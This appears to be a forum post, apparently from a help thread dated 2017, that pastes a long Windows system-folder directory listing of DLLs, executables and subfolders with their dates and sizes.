29.08.2010  18:16         1.196.032 LxTool65VC8.dll
29.08.2010  17:39         1.257.472 LXTool70NSVC8.dll
29.08.2010  17:41         1.245.184 LXTool70VC8.dll
21.09.2010  19:01         1.347.584 LXTool80VC8.dll
24.06.2015  12:48            28.200 LxTPSW100.dll
24.06.2015  12:48           106.536 LxUISettingsN100.dll
24.06.2015  12:48         4.779.560 LxXtreme110.dll
14.07.2009  03:06             2.560 lz32.dll
10.06.2009  23:48             9.958 l_intl.nls
13.05.2017  19:31    <DIR>          Macromed
14.07.2009  03:15            40.448 Magnification.dll
14.07.2009  03:14           629.760 Magnify.exe
21.11.2010  05:24           516.096 main.cpl
14.07.2009  03:14            98.816 makecab.exe
21.11.2010  05:31    <DIR>          manifeststore
14.11.2015  00:50            76.800 mapi32.dll
14.11.2015  00:50            76.800 mapistub.dll
14.07.2009  06:55               535 mapisvc.inf
21.11.2010  05:23           220.672 mcbuilder.exe
21.11.2010  05:25           312.168 MCEWMDRMNDBootstrap.dll
21.11.2010  05:24            84.480 mciavi32.dll
14.07.2009  03:15            38.912 mcicda.dll
21.11.2010  05:24            36.352 mciqtz32.dll
14.07.2009  03:15            23.552 mciseq.dll
14.07.2009  03:15            23.040 mciwave.dll
30.05.2001  19:39           389.120 MCMLDS.dll
14.07.2009  03:06             2.048 mctres.dll
14.07.2009  03:15           205.824 mdminst.dll
21.11.2010  05:25           266.752 MediaMetadataHandler.dll
14.06.2016  17:21         3.209.216 mf.dll
14.07.2009  03:15            41.984 mf3216.dll
14.07.2009  03:15            92.672 mfAACEnc.dll
11.06.2011  02:58         4.397.384 mfc100.dll
11.06.2011  02:58            36.176 mfc100chs.dll
11.06.2011  02:58            36.176 mfc100cht.dll
11.06.2011  02:58            64.336 mfc100deu.dll
11.06.2011  02:58            55.120 mfc100enu.dll
11.06.2011  02:58            63.824 mfc100esn.dll
11.06.2011  02:58            64.336 mfc100fra.dll
11.06.2011  02:58            62.288 mfc100ita.dll
11.06.2011  02:58            43.856 mfc100jpn.dll
11.06.2011  02:58            43.344 mfc100kor.dll
11.06.2011  02:58            60.752 mfc100rus.dll
11.06.2011  02:58         4.422.992 mfc100u.dll
05.10.2013  03:38         4.424.344 mfc120.dll
05.10.2013  03:38            46.248 mfc120chs.dll
05.10.2013  03:38            46.248 mfc120cht.dll
05.10.2013  03:38            74.920 mfc120deu.dll
05.10.2013  03:38            65.192 mfc120enu.dll
05.10.2013  03:38            73.896 mfc120esn.dll
05.10.2013  03:38            74.920 mfc120fra.dll
05.10.2013  03:38            72.872 mfc120ita.dll
05.10.2013  03:38            53.928 mfc120jpn.dll
05.10.2013  03:38            53.416 mfc120kor.dll
05.10.2013  03:38            70.824 mfc120rus.dll
05.10.2013  03:38         4.449.952 mfc120u.dll
21.11.2010  05:24           954.752 mfc40.dll
21.11.2010  05:24           954.288 mfc40u.dll
06.01.2012  14:05         1.137.664 mfc42.dll
06.01.2012  14:05         1.164.288 mfc42u.dll
11.06.2011  02:58            81.744 mfcm100.dll
11.06.2011  02:58            81.744 mfcm100u.dll
05.10.2013  03:38            83.104 mfcm120.dll
05.10.2013  03:38            83.104 mfcm120u.dll
14.07.2009  03:15            25.600 mfcsubs.dll
04.02.2016  20:41           296.448 mfds.dll
14.07.2009  03:15           140.288 mfdvdec.dll
14.06.2016  17:21             2.048 mferror.dll
14.07.2009  03:15           281.088 mfh264enc.dll
04.03.2017  03:14            77.312 mfmjpegdec.dll
14.06.2016  17:21           354.816 mfplat.dll
21.11.2010  05:25           176.128 MFPlay.dll
14.06.2016  17:05            23.040 mfpmp.exe
14.06.2016  17:21           103.424 mfps.dll
21.11.2010  05:25           196.608 mfreadwrite.dll
08.12.2015  23:53            53.248 mfvdsp.dll
08.12.2015  23:53           609.280 MFWMAAEC.DLL
14.07.2009  03:15            18.944 mgmtapi.dll
14.07.2009  03:15            16.896 midimap.dll
14.07.2009  03:20            91.728 MigAutoPlay.exe
21.11.2010  05:24           101.888 migisol.dll
12.05.2017  17:54    <DIR>          migration
14.07.2009  03:15           181.760 miguiresource.dll
08.11.2012  15:07    <DIR>          migwiz
21.11.2010  05:24            42.496 mimefilt.dll
10.06.2009  23:26           673.088 mlang.dat
14.07.2009  03:15           177.664 mlang.dll
14.07.2009  03:14         1.401.344 mmc.exe
14.07.2009  03:15           304.128 mmcbase.dll
14.07.2009  03:15            70.656 mmci.dll
14.07.2009  03:15            12.800 mmcico.dll
21.11.2010  05:24         2.151.936 mmcndmgr.dll
14.07.2009  03:15           128.512 mmcshext.dll
21.11.2010  05:23           213.504 MMDevAPI.dll
14.07.2009  03:06         9.053.696 mmres.dll
21.11.2010  05:23           905.216 mmsys.cpl
21.11.2010  05:25           101.376 mobsync.exe
14.07.2009  01:15            25.088 mode.com
14.07.2009  03:15           288.768 modemui.dll
14.07.2009  01:15            20.992 more.com
14.07.2009  03:06           184.832 moricons.dll
14.07.2009  03:14            13.312 mountvol.exe
08.12.2015  23:53            79.872 MP3DMOD.DLL
08.12.2015  23:53           241.152 MP43DECD.DLL
08.12.2015  23:53           415.744 MP4SDECD.DLL
21.11.2010  05:25            72.704 Mpeg2Data.ax
06.01.2012  14:03           199.680 mpg2splt.ax
08.12.2015  23:53           241.152 MPG4DECD.DLL
14.07.2009  03:15            64.000 mpr.dll
21.11.2010  05:24           158.720 mprapi.dll
21.11.2010  05:23           268.800 mprddm.dll
14.07.2009  03:15            75.264 mprdim.dll
14.07.2009  03:15           104.960 mprmsg.dll
14.07.2009  03:14            11.264 MRINFO.EXE
14.07.2009  03:15           121.344 msaatext.dll
21.11.2010  05:25           226.304 MSAC3ENC.DLL
14.07.2009  03:15            72.192 msacm32.dll
14.07.2009  03:14            20.992 msacm32.drv
14.07.2009  03:14            18.432 msadp32.acm
14.07.2009  03:06             2.560 msafd.dll
21.11.2010  05:23            34.304 msasn1.dll
28.04.2017  02:32           146.432 msaudite.dll
14.07.2009  03:15           219.648 mscandui.dll
14.07.2009  03:15            10.240 mscat32.dll
06.07.1998  18:55            64.512 MSCC2DE.DLL
21.11.2010  05:26           152.576 msclmd.dll
06.07.1998  18:55           158.208 MSCMCDE.DLL
09.02.2017  18:14           481.792 mscms.dll
05.05.2012  11:54           662.288 MSCOMCT2.OCX
09.12.2015  23:39         1.070.232 MSCOMCTL.OCX
21.11.2010  05:24           297.808 mscoree.dll
19.06.2014  00:23           156.824 mscorier.dll
19.06.2014  00:23            81.560 mscories.dll
14.07.2009  03:06             8.192 mscpx32r.dLL
14.07.2009  03:15            28.672 mscpxl32.dLL
11.10.2016  17:18           829.952 msctf.dll
14.07.2009  01:26             7.168 msctfime.ime
14.07.2009  03:15            19.968 MsCtfMonitor.dll
14.07.2009  03:15            81.920 msctfp.dll
14.07.2009  03:15            85.504 msctfui.dll
14.07.2009  03:15           163.840 msdadiag.dll
14.07.2009  03:15           126.976 msdart.dll
14.07.2009  02:11             8.192 msdatsrc.tlb
14.07.2009  03:15           305.152 msdelta.dll
21.11.2010  05:24            30.720 msdmo.dll
04.12.2013  04:02           390.144 msdrm.dll
14.07.2009  03:14           983.040 msdt.exe
14.07.2009  05:20    <DIR>          Msdtc
14.07.2009  03:15           578.560 msdtcprx.dll
14.07.2009  03:15           237.568 msdtcuiu.dll
14.07.2009  03:06            21.504 msdtcVSp1res.dll
21.11.2010  05:25            59.904 MSDvbNP.ax
12.08.2016  18:31             4.096 msdxm.ocx
13.07.2009  23:04            43.520 msdxm.tlb
14.07.2009  03:15           409.600 msexch40.dll
14.07.2009  03:15           339.968 msexcl40.dll
16.04.2017  09:10           693.248 msfeeds.dll
19.11.2013  10:42            43.008 msfeedsbs.dll
19.11.2013  10:42            12.800 msfeedssync.exe
21.11.2010  05:24           592.384 msftedit.dll
14.07.2009  03:14            12.288 msg711.acm
14.07.2009  03:14            23.552 msgsm32.acm
19.11.2013  10:42            13.312 mshta.exe
16.04.2017  09:49        20.278.272 mshtml.dll
16.04.2017  10:19         2.724.864 mshtml.tlb
16.04.2017  10:00            64.000 MshtmlDac.dll
16.04.2017  09:24            76.288 mshtmled.dll
19.11.2013  10:42            48.640 mshtmler.dll
16.04.2017  09:08         1.155.072 mshtmlmedia.dll
09.11.2016  18:17         2.365.440 msi.dll
14.07.2009  03:15           479.232 msidcrl30.dll
14.07.2009  03:15            53.248 msident.dll
14.07.2009  03:15             7.680 msidle.dll
14.07.2009  03:07             4.608 msidntld.dll
30.10.2013  04:19           301.568 msieftp.dll
09.11.2016  17:55            73.216 msiexec.exe
26.07.2014  17:24               199 msiexec.log
09.11.2016  18:17           337.408 msihnd.dll
14.07.2009  03:15            15.872 msiltcfg.dll
14.07.2009  03:15             4.608 msimg32.dll
09.11.2016  18:17            25.088 msimsg.dll
14.07.2009  03:15            31.232 msimtf.dll
21.11.2010  05:24           303.104 msinfo32.exe
14.07.2009  03:15            20.480 msisip.dll
14.07.2009  03:15         1.589.248 msjet40.dll
14.07.2009  03:15           364.544 msjetoledb40.dll
14.07.2009  03:15            24.576 msjint40.dll
14.07.2009  03:15            61.440 msjter40.dll
14.07.2009  03:15           290.816 msjtes40.dll
19.11.2013  10:42           182.272 msls31.dll
14.07.2009  03:15           241.664 msltus40.dll
05.05.2012  11:54           137.000 MSMAPI32.OCX
08.12.2015  23:53           970.240 msmpeg2adec.dll
08.12.2015  23:53           829.952 MSMPEG2ENC.DLL
08.12.2015  23:54         2.285.056 msmpeg2vdec.dll
05.05.2012  11:54            23.552 MSMPIDE.DLL
14.06.2016  17:21           265.216 msnetobj.dll
21.11.2010  05:25           204.288 MSNP.ax
28.04.2017  02:32            60.416 msobjs.dll
14.07.2009  03:15           206.336 msoeacct.dll
14.07.2009  03:15            86.528 msoert2.dll
14.07.2009  03:07             8.192 msorc32r.dll
16.03.2016  20:28           176.128 msorcl32.dll
14.07.2009  03:14         6.376.960 mspaint.exe
14.07.2009  03:15            35.328 mspatcha.dll
14.07.2009  03:15           368.640 mspbde40.dll
14.07.2009  03:15            44.032 msports.dll
14.07.2009  03:14           108.032 msra.exe
14.07.2009  01:19             7.168 MsraLegacy.tlb
16.04.2017  09:25           168.960 msrating.dll
14.07.2009  03:15           319.488 msrd2x40.dll
14.07.2009  03:15           344.064 msrd3x40.dll
14.07.2009  03:15           159.232 msrdc.dll
02.10.2013  02:14            50.176 MsRdpWebAccess.dll
14.07.2009  03:15           643.072 msrepl40.dll
21.11.2010  05:24            13.312 msrle32.dll
06.01.2012  14:08            59.392 msscntrs.dll
14.06.2016  17:21           504.320 msscp.dll
14.07.2009  03:14            95.232 msscript.ocx
14.07.2009  03:15           171.520 mssha.dll
14.07.2009  03:07           268.800 msshavmsg.dll
14.07.2009  03:15            10.240 msshooks.dll
14.07.2009  03:15            39.424 mssign32.dll
14.07.2009  03:15             7.680 mssip32.dll
14.07.2009  03:15           104.448 mssitlb.dll
06.01.2012  14:08           337.408 mssph.dll
06.01.2012  14:08           197.120 mssphtb.dll
14.07.2009  03:15            35.328 mssprxy.dll
06.01.2012  14:08         1.401.344 mssrch.dll
06.01.2012  14:08           666.624 mssvp.dll
14.07.2009  03:15            17.408 msswch.dll
21.11.2010  05:24           209.920 mstask.dll
14.07.2009  03:15           282.624 mstext40.dll
02.10.2013  00:34         1.068.544 mstsc.exe
16.07.2015  21:12         6.131.200 mstscax.dll
21.11.2010  05:24           167.936 msutb.dll
28.04.2017  02:32           261.120 msv1_0.dll
29.04.1999  11:04         1.355.776 msvbvm50.dll
14.07.2009  03:15         1.386.496 msvbvm60.dll
14.07.2009  03:15            59.904 msvcirt.dll
11.06.2011  11:58           421.200 msvcp100.dll
06.11.2012  02:20           535.008 msvcp110.dll
26.03.2017  20:33            19.104 msvcp110_clr0400.dll
05.10.2013  03:38           455.328 msvcp120.dll
22.10.2015  11:08           484.552 msvcp120_clr0400.dll
14.07.2009  03:15           406.528 msvcp60.dll
17.10.2003  13:44           499.712 msvcp71.dll
11.06.2011  11:58           773.968 msvcr100.dll
26.03.2017  20:33            19.104 msvcr100_clr0400.dll
06.11.2012  02:20           875.472 msvcr110.dll
26.03.2017  20:33            19.104 msvcr110_clr0400.dll
05.10.2013  03:38           970.912 msvcr120.dll
22.10.2015  11:09           987.848 msvcr120_clr0400.dll
17.10.2003  13:44           348.160 msvcr71.dll
16.12.2011  09:52           690.688 msvcrt.dll
14.07.2009  03:15           253.952 msvcrt20.dll
14.07.2009  03:07            60.928 msvcrt40.dll
21.11.2010  05:24           120.320 msvfw32.dll
21.11.2010  05:24            31.744 msvidc32.dll
07.10.2016  17:12         2.291.712 MSVidCtl.dll
14.07.2009  03:15           856.064 mswdat10.dll
24.06.1998  00:00           108.336 MSWINSCK.OCX
14.07.2009  03:15           296.960 mswmdm.dll
11.05.2016  17:19           231.424 mswsock.dll
14.07.2009  03:15           618.496 mswstr10.dll
14.07.2009  03:15           454.656 msxbde40.dll
11.01.2017  19:43         1.241.088 msxml3.dll
11.01.2017  19:43             2.048 msxml3r.dll
21.07.2009  01:05         1.348.432 msxml4.dll
18.04.2003  17:29            82.432 msxml4r.dll
27.08.2015  19:58         1.391.104 msxml6.dll
27.08.2015  19:51             2.048 msxml6r.dll
21.11.2010  05:23            22.528 msyuv.dll
14.07.2009  03:14           125.440 mtstocom.exe
21.11.2010  05:24           320.512 mtxclu.dll
14.07.2009  03:15            22.528 mtxdm.dll
14.07.2009  03:15             6.656 mtxex.dll
14.07.2009  03:15            27.648 mtxlegih.dll
16.03.2016  20:28           111.616 mtxoci.dll
08.11.2012  15:07    <DIR>          MUI
21.11.2010  05:24            13.312 muifontsetup.dll
21.11.2010  05:23            70.656 MuiUnattend.exe
14.07.2009  03:16           229.888 mycomput.dll
21.11.2010  05:24           136.192 mydocs.dll
21.11.2010  05:25           221.184 Mystify.scr
10.06.2009  23:25            63.411 NAPCLCFG.MSC
21.11.2010  05:24            46.080 NAPCRYPT.DLL
21.11.2010  05:24            68.096 napdsnap.dll
21.11.2010  05:23           107.008 NAPHLPR.DLL
14.07.2009  03:16            52.224 NapiNSP.dll
14.07.2009  03:16            38.912 napipsec.dll
14.07.2009  03:16           158.208 NAPMONTR.DLL
14.07.2009  03:14           279.552 NAPSTAT.EXE
14.07.2009  03:16            13.312 NativeHooks.dll
21.11.2010  05:24           801.280 NaturalLanguage6.dll
01.05.2013  08:40    <DIR>          nb-NO
14.07.2009  03:16            19.968 NcdProp.dll
21.11.2010  05:24            78.848 nci.dll
14.07.2009  03:16            49.152 ncobjapi.dll
14.07.2009  03:14           100.352 ncpa.cpl
28.04.2017  02:32           223.232 ncrypt.dll
21.11.2010  05:24            60.928 ncryptui.dll
06.12.2014  05:50           156.672 ncsi.dll
14.07.2009  03:14            75.264 ndadmin.exe
14.07.2009  03:16             8.192 nddeapi.dll
14.07.2009  04:34    <DIR>          NDF
14.07.2009  03:16           200.192 ndfapi.dll
14.07.2009  03:16            29.696 ndfetw.dll
10.06.2009  23:18               565 NdfEventView.xml
14.07.2009  03:16            94.720 ndfhcdiscovery.dll
14.07.2009  03:16            41.984 ndiscapCfg.dll
14.07.2009  03:16            71.168 ndishc.dll
14.07.2009  03:16            12.288 ndproxystub.dll
14.07.2009  03:14            50.688 ndptsp.tsp
14.07.2009  03:16            93.696 negoexts.dll
14.07.2009  03:14            46.080 net.exe
21.11.2010  05:24           142.336 net1.exe
04.07.2012  23:16            57.344 netapi32.dll
14.07.2009  03:16            14.336 netbios.dll
11.05.2016  17:01            26.624 netbtugc.exe
21.11.2010  05:23         1.644.032 netcenter.dll
21.11.2010  05:24           406.528 netcfgx.dll
03.10.2012  18:42           175.104 netcorehc.dll
21.11.2010  05:24           225.792 netdiagfx.dll
03.10.2012  18:42            18.944 netevent.dll
21.11.2010  05:24            49.488 netfxperf.dll
14.07.2009  03:07             2.048 neth.dll
21.11.2010  05:24           117.248 netid.dll
21.11.2010  05:24           166.400 netiohlp.dll
21.11.2010  05:24            25.600 netiougc.exe
21.11.2010  05:24           161.792 netjoin.dll
21.11.2010  05:24           563.712 netlogon.dll
14.07.2009  03:07             2.048 netmsg.dll
21.11.2010  05:23           175.616 netplwiz.dll
14.07.2009  03:14            26.112 Netplwiz.exe
14.07.2009  03:16           481.792 netprof.dll
14.07.2009  03:16           360.448 netprofm.dll
14.07.2009  03:14            96.256 netsh.exe
21.11.2010  05:24         2.494.464 netshell.dll
14.07.2009  03:14            27.136 NETSTAT.EXE
21.11.2010  05:24            22.528 netutils.dll
21.11.2010  05:24         1.661.440 networkexplorer.dll
14.07.2009  03:16            40.960 networkitemfactory.dll
14.07.2009  05:20    <DIR>          NetworkList
21.11.2010  05:24         2.130.944 networkmap.dll
14.07.2009  03:16           313.856 newdev.dll
14.07.2009  03:14            76.800 newdev.exe
01.05.2013  08:41    <DIR>          nl-NL
06.12.2014  05:50            52.224 nlaapi.dll
14.07.2009  03:16           134.144 nlhtml.dll
14.07.2009  03:16           156.672 nlmgp.dll
14.07.2009  03:16            11.264 nlmsprep.dll
11.10.2016  17:18            69.120 nlsbres.dll
14.07.2009  03:16         1.537.536 NlsData0000.dll
14.07.2009  03:16         2.609.664 NlsData0001.dll
14.07.2009  03:16         1.977.856 NlsData0002.dll
14.07.2009  03:16         1.977.856 NlsData0003.dll
14.07.2009  03:16         2.255.360 NlsData0007.dll
14.07.2009  03:16         4.888.576 NlsData0009.dll
14.07.2009  03:16        10.240.512 NlsData000a.dll
14.07.2009  03:16         2.654.208 NlsData000c.dll
14.07.2009  03:16         2.353.152 NlsData000d.dll
14.07.2009  03:16         1.977.856 NlsData000f.dll
14.07.2009  03:16         4.507.648 NlsData0010.dll
14.07.2009  03:16         2.670.592 NlsData0011.dll
14.07.2009  03:16         3.476.480 NlsData0013.dll
14.07.2009  03:16         1.977.856 NlsData0018.dll
14.07.2009  03:16         4.509.696 NlsData0019.dll
14.07.2009  03:16         1.977.856 NlsData001a.dll
14.07.2009  03:16         1.977.856 NlsData001b.dll
14.07.2009  03:16         4.507.648 NlsData001d.dll
14.07.2009  03:16         3.116.544 NlsData0020.dll
14.07.2009  03:16         1.811.968 NlsData0021.dll
14.07.2009  03:16         1.811.968 NlsData0022.dll
14.07.2009  03:16         1.977.856 NlsData0024.dll
14.07.2009  03:16         1.977.856 NlsData0026.dll
14.07.2009  03:16         1.979.392 NlsData0027.dll
14.07.2009  03:16         1.811.968 NlsData002a.dll
14.07.2009  03:16         3.116.544 NlsData0039.dll
14.07.2009  03:16         1.811.968 NlsData003e.dll
14.07.2009  03:16         3.116.544 NlsData0045.dll
14.07.2009  03:16         3.116.544 NlsData0046.dll
14.07.2009  03:16         3.116.544 NlsData0047.dll
14.07.2009  03:16         3.116.544 NlsData0049.dll
14.07.2009  03:16         3.116.544 NlsData004a.dll
14.07.2009  03:16         3.116.544 NlsData004b.dll
14.07.2009  03:16         3.116.544 NlsData004c.dll
14.07.2009  03:16         3.116.544 NlsData004e.dll
14.07.2009  03:16         4.507.648 NlsData0414.dll
14.07.2009  03:16         4.507.648 NlsData0416.dll
14.07.2009  03:16         4.507.648 NlsData0816.dll
14.07.2009  03:16         1.977.856 NlsData081a.dll
14.07.2009  03:16         1.977.856 NlsData0c1a.dll
14.07.2009  03:16            26.112 Nlsdl.dll
14.07.2009  03:08        11.722.752 NlsLexicons0001.dll
14.07.2009  03:08         4.164.096 NlsLexicons0002.dll
14.07.2009  03:08         1.452.544 NlsLexicons0003.dll
14.07.2009  03:08        12.038.656 NlsLexicons0007.dll
14.07.2009  03:08         2.628.608 NlsLexicons0009.dll
14.07.2009  03:08         9.892.864 NlsLexicons000a.dll
14.07.2009  03:08         6.237.696 NlsLexicons000c.dll
14.07.2009  03:08         1.722.368 NlsLexicons000d.dll
14.07.2009  03:08         5.654.528 NlsLexicons000f.dll
14.07.2009  03:08         4.175.872 NlsLexicons0010.dll
14.07.2009  03:08         2.466.816 NlsLexicons0011.dll
14.07.2009  03:08         4.981.248 NlsLexicons0013.dll
14.07.2009  03:08         3.331.072 NlsLexicons0018.dll
14.07.2009  03:08         6.781.440 NlsLexicons0019.dll
14.07.2009  03:08         6.014.976 NlsLexicons001a.dll
14.07.2009  03:08         6.585.856 NlsLexicons001b.dll
14.07.2009  03:08         6.346.240 NlsLexicons001d.dll
14.07.2009  03:08         1.236.992 NlsLexicons0020.dll
14.07.2009  03:08         2.136.064 NlsLexicons0021.dll
14.07.2009  03:08         5.499.904 NlsLexicons0022.dll
14.07.2009  03:08         7.964.672 NlsLexicons0024.dll
14.07.2009  03:08         5.791.232 NlsLexicons0026.dll
14.07.2009  03:08         6.224.896 NlsLexicons0027.dll
14.07.2009  03:08             4.096 NlsLexicons002a.dll
14.07.2009  03:08         1.782.272 NlsLexicons0039.dll
14.07.2009  03:08         4.045.824 NlsLexicons003e.dll
14.07.2009  03:08         1.793.536 NlsLexicons0045.dll
14.07.2009  03:08         1.808.896 NlsLexicons0046.dll
14.07.2009  03:08         1.411.072 NlsLexicons0047.dll
14.07.2009  03:08         1.558.016 NlsLexicons0049.dll
14.07.2009  03:08         3.419.136 NlsLexicons004a.dll
14.07.2009  03:08         1.702.912 NlsLexicons004b.dll
14.07.2009  03:08         4.093.440 NlsLexicons004c.dll
14.07.2009  03:08         1.972.736 NlsLexicons004e.dll
14.07.2009  03:08         4.616.192 NlsLexicons0414.dll
14.07.2009  03:08         5.090.816 NlsLexicons0416.dll
14.07.2009  03:08         5.031.936 NlsLexicons0816.dll
14.07.2009  03:08         7.042.560 NlsLexicons081a.dll
14.07.2009  03:08         6.917.120 NlsLexicons0c1a.dll
14.07.2009  03:09         5.071.872 NlsModels0011.dll
10.06.2009  23:29             1.696 NOISE.CHS
10.06.2009  23:29             1.696 NOISE.CHT
10.06.2009  23:32               741 NOISE.DAT
10.06.2009  23:32             2.060 noise.jpn
10.06.2009  23:29             1.486 noise.kor
10.06.2009  23:29               697 NOISE.THA
14.07.2009  03:09             2.048 normaliz.dll
09.07.2015  19:42           179.712 notepad.exe
14.07.2009  03:16            16.896 npmproxy.dll
14.07.2009  03:16            27.136 nshhttp.dll
21.11.2010  05:24           346.112 nshipsec.dll
12.10.2013  04:03           656.896 nshwfp.dll
14.07.2009  03:16             8.704 nsi.dll
21.11.2010  05:24            98.304 nslookup.exe
28.04.2017  02:34         1.314.112 ntdll.dll
14.07.2009  03:16            90.112 ntdsapi.dll
28.04.2017  02:36         4.000.488 ntkrnlpa.exe
21.11.2010  05:24            69.120 ntlanman.dll
14.07.2009  03:16            15.872 ntlanui2.dll
14.07.2009  03:16           121.856 ntmarta.dll
28.04.2017  02:36         3.945.192 ntoskrnl.exe
25.06.2016  21:53           297.472 ntprint.dll
25.06.2016  21:41            61.952 ntprint.exe
04.01.2012  10:58           442.880 ntshrui.dll
28.04.2017  02:08            14.336 ntvdm64.dll
16.02.2016  23:10    <DIR>          NV
09.02.2016  10:39         3.259.688 nvapi.dll
18.12.2015  08:10            90.768 nvaudcap32v.dll
09.02.2016  10:39        37.616.696 nvcompiler.dll
09.02.2016  10:39        17.218.792 nvcuda.dll
09.02.2016  10:39         2.722.872 nvcuvid.dll
09.02.2016  10:39        14.016.576 nvd3dum.dll
24.02.2012  03:30           301.376 nvdecodemft.dll
09.02.2016  10:39           747.064 NvFBC.dll
09.02.2016  10:39           691.256 NvIFR.dll
09.02.2016  10:39           153.208 nvinit.dll
09.02.2016  10:39           128.696 nvoglshim32.dll
09.02.2016  10:39        24.916.536 nvoglv32.dll
09.02.2016  10:39        17.625.136 nvopencl.dll
24.02.2012  03:30           331.072 nvoptimusmft.dll
12.01.2016  06:41         1.316.184 nvspbridge.dll
12.01.2016  06:41         1.542.600 nvspcap.dll
09.02.2016  07:26           111.672 nvStreaming.exe
09.02.2016  10:39           388.560 nvumdshim.dll
09.02.2016  10:39        16.327.896 nvwgf2um.dll

MBJPaul · 25.05.2017, 21:12

Code:

ATTFilter


04.03.2014  11:17           538.112 objsel.dll
16.04.2017  09:20           130.048 occache.dll
21.11.2010  05:24           174.592 ocsetapi.dll
21.11.2010  05:24           197.632 ocsetup.exe
21.11.2010  05:24           573.440 odbc32.dll
14.07.2009  03:16            24.576 odbc32gt.dll
14.07.2009  03:14            86.016 odbcad32.exe
14.07.2009  03:16            49.152 odbcbcp.dll
21.11.2010  05:24            40.960 odbcconf.dll
14.07.2009  03:14            32.768 odbcconf.exe
14.07.2009  01:06             4.453 odbcconf.rsp
06.01.2012  14:09           122.880 odbccp32.dll
06.01.2012  14:09            81.920 odbccr32.dll
06.01.2012  14:09            86.016 odbccu32.dll
14.07.2009  03:09           229.376 odbcint.dll
14.07.2009  03:16            24.576 odbcji32.dll
06.01.2012  14:09           319.488 odbcjt32.dll
06.01.2012  14:09           163.840 odbctrac.dll
14.07.2009  03:16            20.480 oddbse32.dll
14.07.2009  03:16            20.480 odexl32.dll
14.07.2009  03:16            20.480 odfox32.dll
14.07.2009  03:16            20.480 odpdx32.dll
14.07.2009  03:16            20.480 odtext32.dll
14.07.2009  03:16           204.800 offfilt.dll
07.12.2012  12:46            45.568 oflc-nz.rs
07.12.2012  12:46            23.552 oflc.rs
14.07.2009  03:16         1.106.944 ogldrv.dll
30.10.2003  22:58         1.676.408 OLCH2X32.OCX
08.05.1998  16:28               393 OLCHART.LIC
10.06.2009  23:25            42.592 ole2.dll
10.06.2009  23:25           169.520 ole2disp.dll
10.06.2009  23:25           153.008 ole2nls.dll
17.04.2017  17:12         1.417.728 ole32.dll
06.01.2012  14:10           233.472 oleacc.dll
14.07.2009  03:16             9.216 oleacchooks.dll
14.07.2009  03:09             4.096 oleaccrc.dll
17.04.2017  17:12           581.632 oleaut32.dll
14.07.2009  03:16            80.384 olecli32.dll
14.07.2009  03:16           103.424 oledlg.dll
11.07.2012  23:00            75.776 Olepau32.ax
14.07.2009  03:16           107.008 oleprn.dll
12.05.2016  17:18            90.624 olepro32.dll
17.04.2017  17:12            26.112 oleres.dll
14.07.2009  03:16            28.672 olesvr32.dll
21.11.2010  05:23            77.824 olethk32.dll
21.11.2010  05:24           199.168 onex.dll
21.11.2010  05:24         1.111.552 onexui.dll
21.11.2010  05:24           218.112 OnLineIDCpl.dll
08.11.2012  15:07    <DIR>          oobe
21.11.2010  05:25           859.648 OobeFldr.dll
21.11.2010  05:23         1.160.192 OpcServices.dll
09.02.2016  10:39           201.664 OpenCL.dll
14.07.2009  03:14            62.464 openfiles.exe
14.07.2009  03:16           791.552 opengl32.dll
14.07.2009  03:14            97.280 OptionalFeatures.exe
14.07.2009  03:16            19.456 osbaseln.dll
18.06.2014  03:51           646.144 osk.exe
14.07.2009  03:16             6.656 osuninst.dll
14.07.2009  03:16           217.088 P2P.dll
14.07.2009  03:16           412.672 p2pcollab.dll
14.07.2009  03:16           334.848 P2PGraph.dll
14.07.2009  03:16           136.704 p2pnetsh.dll
25.10.2014  03:32            67.584 packager.dll
14.07.2009  03:16            10.752 panmap.dll
14.07.2009  03:14            13.312 PATHPING.EXE
14.07.2009  03:16            44.032 pautoenr.dll
14.07.2009  03:16            87.040 pcaui.dll
14.07.2009  03:14            15.872 pcaui.exe
10.06.2009  23:39               114 pcl.sep
14.07.2009  03:16            33.280 pcwum.dll
10.03.2017  18:20           237.056 pdh.dll
21.11.2010  05:24            46.592 pdhui.dll
14.07.2009  03:16           139.776 PeerDist.dll
14.07.2009  03:16           666.112 PeerDistSh.dll
07.12.2012  12:46            20.480 pegi-fi.rs
07.12.2012  12:46            20.480 pegi-pt.rs
07.12.2012  12:46            20.480 pegi.rs
07.12.2012  12:46            44.544 pegibbfc.rs
21.11.2010  05:24           600.576 PerfCenterCPL.dll
10.06.2009  23:17           116.288 PerfCenterCpl.ico
14.07.2009  03:16            39.424 perfctrs.dll
14.07.2009  03:16            31.232 perfdisk.dll
14.07.2009  03:14            20.992 perfhost.exe
21.11.2010  05:24           157.184 perfmon.exe
10.06.2009  23:31           145.519 perfmon.msc
14.07.2009  03:16            20.992 perfnet.dll
14.07.2009  03:16            28.672 perfos.dll
14.07.2009  03:16            35.328 perfproc.dll
12.05.2017  17:37         1.594.892 PerfStringBackup.INI
21.11.2010  05:24            17.408 perfts.dll
11.10.2016  17:18           125.952 phon.ime
14.07.2009  03:16           316.928 PhotoMetadataHandler.dll
21.11.2010  05:25           413.696 PhotoScreensaver.scr
21.11.2010  05:25           295.424 photowiz.dll
14.07.2009  03:16            36.352 pid.dll
14.07.2009  03:16         1.234.944 pidgenx.dll
21.11.2010  05:24            35.328 pifmgr.dll
14.07.2009  03:14            15.360 PING.EXE
11.10.2016  17:18            90.112 pintlgnt.ime
21.11.2010  05:24           209.920 PkgMgr.exe
11.11.2014  04:44           186.880 pku2u.dll
01.05.2013  08:40    <DIR>          pl-PL
10.03.2017  18:20         1.508.352 pla.dll
14.07.2009  03:16            77.312 PlaySndSrv.dll
21.11.2010  05:24           629.760 pmcsnap.dll
10.10.2004  10:50           278.528 pncrt.dll
19.11.2013  10:42            56.832 pngfilt.dll
21.11.2010  05:24         1.750.528 pnidui.dll
14.07.2009  03:09            74.752 pnpsetup.dll
14.07.2009  03:16            65.024 pnrpnsp.dll
12.05.2016  17:18           274.944 polstore.dll
22.07.2016  16:51           123.904 poqexec.exe
21.11.2010  05:25           547.840 PortableDeviceApi.dll
14.07.2009  03:16           110.080 PortableDeviceClassExtension.dll
14.07.2009  03:16            60.928 PortableDeviceConnectApi.dll
21.11.2010  05:25           427.520 PortableDeviceStatus.dll
21.11.2010  05:24           183.296 PortableDeviceSyncProvider.dll
14.07.2009  03:16           159.744 PortableDeviceTypes.dll
14.07.2009  03:16           138.240 PortableDeviceWiaCompat.dll
14.07.2009  03:16           196.608 PortableDeviceWMDRM.dll
14.07.2009  03:16            22.528 pots.dll
21.11.2010  05:24           142.336 powercfg.cpl
14.07.2009  03:14            59.392 powercfg.exe
